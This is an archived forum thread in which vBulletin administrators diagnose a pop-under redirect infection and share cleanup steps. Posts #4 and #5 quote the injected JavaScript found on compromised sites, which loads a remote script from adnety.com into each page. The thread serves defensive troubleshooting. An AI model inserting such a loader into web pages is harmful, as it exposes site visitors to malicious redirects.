The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
|
|||||||
|
#1
10-11-2016, 07:27 PM
|
||||
|
||||
Pop Unders with false click..!
So, basically i have been noticing many vb forums affected by this pop under malware..
What happens is, when you make a click on your site, the pop under appears and it redirects you to these sites.. adnety.com clicknety.com namefuze.com Affected vBulletin Sites so far.. http://www.neogaf.com/forum/showthread.php?t=1229205&page=28 http://www.tsptalk.com/mb/report-problems/26162-pop-ups-anyone-still-seeing-them.html? http://www.contractortalk.com/f45/virus-pop-up-301393/ https://forums.rajah.com/showthread.php?151343-Pop-ups FIX: Quote:
Best Practices... 1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons. 2) Check your plugins list for any that are not part of a product you've added: AdminCP > Plugins & Products > Plugin Manager Any listed under 'vBulletin' at the top of the list should be examined carefully and removed if you're unsure as to what they are. 3) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site. 4) Update the following passwords in addition to your AdminCP: - FTP - Database When updating the database password, ensure you also change your config.php file to use the new password otherwise your site won't be able to connect to the database. 5) Secure your AdminCP directory via .htaccess/.htpasswd. Credits: Trevor Hannant 
|
|
#2
10-11-2016, 07:33 PM
|
||||
|
||||
|
More than likely hidden in a file, called via referencing a url... could or could not be in base64 format i.e. encrypted per say from reading heck not sure, will know more once I run into this first-hand as with all this crud these terd-nuggets (hacker folks) come up with
 .
|
|
#3
10-11-2016, 07:35 PM
|
||||
|
||||
|
Update:
The temporary fix to this issue is by disabling the plugin system. Code:
define('DISABLE_HOOKS', true);
|
|
#4
10-11-2016, 07:40 PM
|
||||
|
||||
|
This code is at the top of two of your sites listed, I'd check for that on the site you have access to.
On one site: Code:
<script type="text/javascript">
var win = [];
win['webid'] = '22357fb864e954c229';
win['traffic'] = '0';
win['raw'] = '2';
win['pop'] = '0';
(function() {
var pGTP = document.createElement('script'); pGTP.type = 'text/javascript'; pGTP.async = true;
var selectGtp = document.getElementsByTagName('script')[0];
pGTP.src = 'https://adnety.com/dashboard/call.js';
selectGtp.parentNode.insertBefore(pGTP, selectGtp);
})();
</script>
Code:
<script type="text/javascript">
var win = [];
win['webid'] = '78557fb86330ee36940';
win['traffic'] = '0';
win['raw'] = '2';
win['pop'] = '0';
(function() {
var pGTP = document.createElement('script'); pGTP.type = 'text/javascript'; pGTP.async = true;
var selectGtp = document.getElementsByTagName('script')[0];
pGTP.src = 'https://adnety.com/dashboard/call.js';
selectGtp.parentNode.insertBefore(pGTP, selectGtp);
})();
</script>
|
|
#5
10-11-2016, 07:51 PM
|
||||
|
||||
|
The site which i have access is undergoing server update, i will get you the details once it's done.
This was the code found on their site.. Code:
<script type="text/javascript">
var win = [];
win['webid'] = '46157fb85796a03666';
win['traffic'] = '0';
win['raw'] = '2';
win['pop'] = '0';
(function() { var pGTP = document.createElement('script');
pGTP.type = 'text/javascript'; pGTP.async = true;
var selectGtp = document.getElementsByTagName('script')[0];
pGTP.src = 'https://adnety.com/dashboard/call.js';
selectGtp.parentNode.insertBefore(pGTP, selectGtp); })(); </script>
|
|
#6
10-11-2016, 07:53 PM
|
||||
|
||||
|
Quote:
 . Also once removed check in a day or so and one solid week after to ensure it wasn't added again i.e. shell script left on the site OR code in a file that allows the code to be re-inserted etc etc.While I find this interesting I'm terribly busy today so I may not be back to comment again for a few hours, catch up is my name at the moment (lol).
|
|
#7
10-11-2016, 07:56 PM
|
||||
|
||||
|
Quote:
I am super sleepy as well, 3:25AM at my side of the world.
|
|
#8
10-12-2016, 08:21 AM
|
||||
|
||||
|
Generally, we've found these have been caused by a rogue plugin installed under the 'vBulletin' product. Anyone else with this issue should check there in the first instance and delete it if there is one.
|
| Благодарность от: | ||
| socialteenz | ||
|
#9
10-12-2016, 06:57 PM
|
||||
|
||||
|
Quote:
Thanks.
|
 |
«
Previous Thread
|
Next Thread
»
Linear Mode
|
|
All times are GMT. The time now is 11:21 AM.